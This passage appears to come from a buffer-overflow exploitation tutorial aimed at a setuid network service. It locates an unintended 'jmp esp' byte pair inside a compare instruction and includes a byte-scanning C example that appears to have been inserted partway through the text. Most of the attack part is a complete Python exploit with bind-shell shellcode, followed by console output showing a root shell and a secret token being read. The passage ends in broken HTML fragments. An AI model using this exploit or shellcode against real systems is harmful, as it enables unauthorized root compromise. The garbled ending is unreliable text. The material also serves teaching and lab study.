 8048d47: 8b 45 0c              mov    eax,DWORD PTR [ebp+0xc]
 8048d4a: 89 44 24 04           mov    DWORD PTR [esp+0x4],eax
 8048d4e: 8b 45 08              mov    eax,DWORD PTR [ebp+0x8]
 8048d51: 89 04 24              mov    DWORD PTR [esp],eax
 8048d54: ff 94 b3 00 ff ff ff  call   DWORD PTR [ebx+esi*4-0x100]
 8048d5b: 83 c6 01              add    esi,0x1
 8048d5e: 39 fe                 cmp    esi,edi
 8048d60: 72 de                 jb     8048d40 <__libc_csu_init+0x30>
 8048d62: 83 c4 1c              add    esp,0x1c
 8048d65: 5b                    pop    ebx
 8048d66: 5e                    pop    esi
 8048d67: 5f                    pop    edi
 8048d68: 5d                    pop    ebp
 8048d69: c3                    ret

08048d6a <__i686.get_pc_thunk.bx>:
 8048d6a: 8b 1c 24              mov    ebx,DWORD PTR [esp]
 8048d6d: c3                    ret
 8048d6e: 90                    nop
 8048d6f: 90                    nop

Disassembly of section .fini:

08048d70 <_fini>:
 8048d70: 55                    push   ebp
 8048d71: 89 e5                 mov    ebp,esp
 8048d73: 53                    push   ebx
 8048d74: 83 ec 04              sub    esp,0x4
 8048d77: e8 00 00 00 00        call   8048d7c <_fini+0xc>
 8048d7c: 5b                    pop    ebx
 8048d7d: 81 c3 84 03 00 00     add    ebx,0x384
 8048d83: 59                    pop    ecx
 8048d84: 5b                    pop    ebx
 8048d85: c9                    leave
 8048d86: c3                    ret
```

There aren't any `jmp esp`s there; you can use grep to make it a little easier to go through:

```console
[email protected]:~$ objdump -d ./app-net -M intel | grep jmp
 8048616: ff 25 08 91 04 08     jmp    DWORD PTR ds:0x8049108
 8048620: ff 25 0c 91 04 08     jmp    DWORD PTR ds:0x804910c
 804862b: e9 e0 ff ff ff        jmp    8048610 <_init+0x30>
 8048630: ff 25 10 91 04 08     jmp    DWORD PTR ds:0x8049110
 804863b: e9 d0 ff ff ff        jmp    8048610 <_init+0x30>
 8048640: ff 25 14 91 04 08     jmp    DWORD PTR ds:0x8049114
 804864b: e9 c0 ff ff ff        jmp    8048610 <_init+0x30>
 8048650: ff 25 18 91 04 08     jmp    DWORD PTR ds:0x8049118
 804865b: e9 b0 ff ff ff        jmp    8048610 <_init+0x30>
 8048660: ff 25 1c 91 04 08     jmp    DWORD PTR ds:0x804911c
 804866b: e9 a0 ff ff ff        jmp    8048610 <_init+0x30>
 8048670: ff 25 20 91 04 08     jmp    DWORD PTR ds:0x8049120
 804867b: e9 90 ff ff ff        jmp    8048610 <_init+0x30>
 8048680: ff 25 24 91 04 08     jmp    DWORD PTR ds:0x8049124
 804868b: e9 80 ff ff ff        jmp    8048610 <_init+0x30>
 8048690: ff 25 28 91 04 08     jmp    DWORD PTR ds:0x8049128
 804869b: e9 70 ff ff ff        jmp    8048610 <_init+0x30>
 80486a0: ff 25 2c 91 04 08     jmp    DWORD PTR ds:0x804912c
 80486ab: e9 60 ff ff ff        jmp    8048610 <_init+0x30>
 80486b0: ff 25 30 91 04 08     jmp    DWORD PTR ds:0x8049130
 80486bb: e9 50 ff ff ff        jmp    8048610 <_init+0x30>
 80486c0: ff 25 34 91 04 08     jmp    DWORD PTR ds:0x8049134
 80486cb: e9 40 ff ff ff        jmp    8048610 <_init+0x30>
 80486d0: ff 25 38 91 04 08     jmp    DWORD PTR ds:0x8049138
 80486db: e9 30 ff ff ff        jmp    8048610 <_init+0x30>
 80486e0: ff 25 3c 91 04 08     jmp    DWORD PTR ds:0x804913c
 80486eb: e9 20 ff ff ff        jmp    8048610 <_init+0x30>
 80486f0: ff 25 40 91 04 08     jmp    DWORD PTR ds:0x8049140
 80486fb: e9 10 ff ff ff        jmp    8048610 <_init+0x30>
 8048700: ff 25 44 91 04 08     jmp    DWORD PTR ds:0x8049144
 804870b: e9 00 ff ff ff        jmp    8048610 <_init+0x30>
 8048710: ff 25 48 91 04 08     jmp    DWORD PTR ds:0x8049148
 804871b: e9 f0 fe ff ff        jmp    8048610 <_init+0x30>
 8048720: ff 25 4c 91 04 08     jmp    DWORD PTR ds:0x804914c
 804872b: e9 e0 fe ff ff        jmp    8048610 <_init+0x30>
 8048730: ff 25 50 91 04 08     jmp    DWORD PTR ds:0x8049150
 804873b: e9 d0 fe ff ff        jmp    8048610 <_init+0x30>
 8048740: ff 25 54 91 04 08     jmp    DWORD PTR ds:0x8049154
 804874b: e9 c0 fe ff ff        jmp    8048610 <_init+0x30>
 8048750: ff 25 58 91 04 08     jmp    DWORD PTR ds:0x8049158
 804875b: e9 b0 fe ff ff        jmp    8048610 <_init+0x30>
 8048760: ff 25 5c 91 04 08     jmp    DWORD PTR ds:0x804915c
 804876b: e9 a0 fe ff ff        jmp    8048610 <_init+0x30>
 8048770: ff 25 60 91 04 08     jmp    DWORD PTR ds:0x8049160
 804877b: e9 90 fe ff ff        jmp    8048610 <_init+0x30>
 8048862: e9 79 ff ff ff        jmp    80487e0 <register_tm_clones>
 8048867: e9 74 ff ff ff        jmp    80487e0 <register_tm_clones>
 8048a46: eb 78                 jmp    8048ac0 <main+0x254>
 8048a83: eb 3b                 jmp    8048ac0 <main+0x254>
 8048aef: e9 59 fe ff ff        jmp    804894d <main+0xe1>
 8048b17: eb 31                 jmp    8048b4a <sendfile+0x56>
 8048b6b: eb 18                 jmp    8048b85 <sendfile+0x91>
 8048c1c: eb 31                 jmp    8048c4f <sendtoken+0x56>
 8048c70: eb 18                 jmp    8048c8a <sendtoken+0x91>
 8048cdd: eb 19                 jmp    8048cf8 <checkpass+0x6c>
```

However, we do have another option.
`objdump` shows the instructions as they would be run by the processor during normal operation, but you don't have to use them that way: you can instead start execution in the middle of an instruction, which turns its trailing bytes into a new instruction.

This is what we are going to try to do (this was also the reason for the extra check in the application, as you will see).

First we need to figure out what [opcodes](https://en.wikipedia.org/wiki/Opcode) `jmp esp` results in. We start by creating a simple assembly application with just `jmp esp` in it:

```nasm
global _start

_start:
    jmp esp
```

Now we need to assemble and link it, and then disassemble it with `objdump`:

```console
[email protected]:~$ nasm -f elf32 -o jesp.o jesp.nasm
[email protected]:~$ ld -o jesp jesp.o
[email protected]:~$ objdump -d ./jesp -M intel

./jesp:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060: ff e4                 jmp    esp
```

So all we need to do is find `ff e4` anywhere in the application code. A quick grep finds us an instruction that contains this sequence:

```console
[email protected]:~$ objdump -d ./app-net -M intel | grep 'ff e4'
 8048ccd: 81 7d f0 ff e4 00 00  cmp    DWORD PTR [ebp-0x10],0xe4ff
```

This is the compare against `58623` on line 104 of the source code above: `58623` is `e4ff` in hex, and it is stored as `ff e4` because we are on a [little endian](https://en.wikipedia.org/wiki/Endianness#Little-endian) system.

The instruction starts at the memory address `08048ccd` and our `jmp esp` is 3 bytes into it, so adding 3 to `08048ccd` gives `08048cd0`.
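To check that arithmetic in code, here is an added example (written for this edit; it is not code from the original post or from the app): a sliding-window scan that looks for a byte pair at every offset of a code region, including offsets that fall inside a longer instruction's immediate, and reports the address each hit would have. The byte array is constructed from the three instructions at `08048cca`, `08048ccd` and `08048cd4` in the `objdump` output above; the base address, the `ff e4` pattern and the `58623` constant are the page's own values. The same scan is also how you would audit your own build for unintended `jmp esp` byte pairs, which a magic constant such as `58623` can introduce without any `jmp esp` appearing in the disassembly.

```c
/* Added example: find a byte pattern at any offset in a code region and
 * show how a 32-bit constant is laid out in memory on little-endian x86. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed from the objdump listing above: the bytes of the three
 * instructions at 0x08048cca, 0x08048ccd and 0x08048cd4 in checkpass. */
static const uint8_t code[] = {
    0x89, 0x45, 0xf0,                          /* 8048cca: mov [ebp-0x10],eax      */
    0x81, 0x7d, 0xf0, 0xff, 0xe4, 0x00, 0x00,  /* 8048ccd: cmp [ebp-0x10],0xe4ff   */
    0x75, 0x09,                                /* 8048cd4: jne 8048cdf             */
};
static const uint32_t code_base = 0x08048cca;  /* address of code[0] */

/* Encoding of `jmp esp`, as produced by the nasm/objdump step above. */
static const uint8_t JMP_ESP[] = { 0xff, 0xe4 };

/* Slide a window over every byte offset of buf (ignoring instruction
 * boundaries, exactly as grep on the hex dump does) and record the address
 * base + offset of each match in out, up to max entries. Returns the total
 * number of matches, so out may be NULL with max == 0 to just count. */
size_t find_pattern(const uint8_t *buf, size_t len, uint32_t base,
                    const uint8_t *pat, size_t plen,
                    uint32_t *out, size_t max)
{
    size_t n = 0;
    if (plen == 0 || len < plen)
        return 0;
    for (size_t off = 0; off + plen <= len; off++) {
        if (memcmp(buf + off, pat, plen) == 0) {
            if (n < max)
                out[n] = base + (uint32_t)off;
            n++;
        }
    }
    return n;
}

/* Byte i (0 = least significant) of v as it sits in memory on x86. */
uint32_t le32_byte(uint32_t v, unsigned i)
{
    return (v >> (8 * i)) & 0xffu;
}

/* Write v to out[0..3] in little-endian order. */
void le32(uint32_t v, uint8_t out[4])
{
    for (unsigned i = 0; i < 4; i++)
        out[i] = (uint8_t)le32_byte(v, i);
}

/* Address of the first ff e4 pair inside the constructed sample, 0 if none. */
uint32_t first_jmp_esp_addr(void)
{
    uint32_t hits[4];
    size_t n = find_pattern(code, sizeof code, code_base,
                            JMP_ESP, sizeof JMP_ESP, hits, 4);
    return n ? hits[0] : 0;
}

int main(void)
{
    uint32_t addr = first_jmp_esp_addr();
    uint8_t enc[4];

    le32(addr, enc);
    printf("ff e4 found at 0x%08x; little-endian bytes: %02x %02x %02x %02x\n",
           (unsigned)addr, enc[0], enc[1], enc[2], enc[3]);

    /* The pair comes from the immediate 58623 (0xe4ff) stored little-endian. */
    le32(58623u, enc);
    printf("58623 = 0x%04x -> %02x %02x %02x %02x\n",
           58623u, enc[0], enc[1], enc[2], enc[3]);
    return 0;
}
```

Build with `gcc -std=c99 -Wall -o scan scan.c` (file name assumed) and run it: the hit is reported at `0x08048cd0`, three bytes past the start of the `cmp`, and its little-endian encoding is `d0 8c 04 08`. Note that the reversed pair `e4 ff` is not found, which is the point: the order the bytes occupy in memory, not the value as written in the source, decides what unintended instruction they form.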
`08048cd0` is the address we will overwrite the return address with.

## Exploiting The App

Using all of the information we've retrieved so far we can build our exploit:

```python
#!/usr/bin/env python

import socket

shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"

payload = "A" * 532

payload += "\xd0\x8c\x04\x08" # the address of our 0xff 0xe4
                              # in reverse (little endian)

payload += "\x90" * 20 # nop sled

payload += shellcode # append our shellcode

# create the tcp socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to 127.0.0.1 port 9999
s.connect(("127.0.0.1", 9999))

# send our payload
s.send(payload)

# close the socket
s.close()
```

The only changes here are: before we overwrite the return address we send only `A`s (532 of them: 528 for the local variables and 4 for the saved EBP); then we put our return address (the address of `jmp esp`, **08048cd0**); and lastly we stick on our [NOP sled](https://en.wikipedia.org/wiki/NOP_slide) and shellcode (the NOP sled isn't actually needed, though, as we know ESP will point to the start of our code).

We can now exploit the application. First run the app again:

```console
[email protected]:~$ ./app-net
```

Now launch the exploit and connect to our shell:

```console
[email protected]:~$ python app-net-exploit2.py
[email protected]:~$ nc 127.0.0.1 9998
pwd
/home/appuser
whoami
root
ls -l
total 32
-rwsr-xr-x 1 root    root    8431 Jul  7 22:01 app-net
-rwxr-xr-x 1 appuser appuser  486 Jul  8 11:16 jesp
-rw-r--r-- 1 appuser appuser   32 Jul  8 11:08 jesp.nasm
-rw-r--r-- 1 appuser appuser  432 Jul  8 11:16 jesp.o
-rw------- 1 root    root      93 Jul  7 22:02 secret.txt
-rw------- 1 root    root      29 Jul  7 22:03 token
cat token
```
class="code-line"span class="go"084934-3492048234728-4847847/span/span span class="code-line"span class="go"cat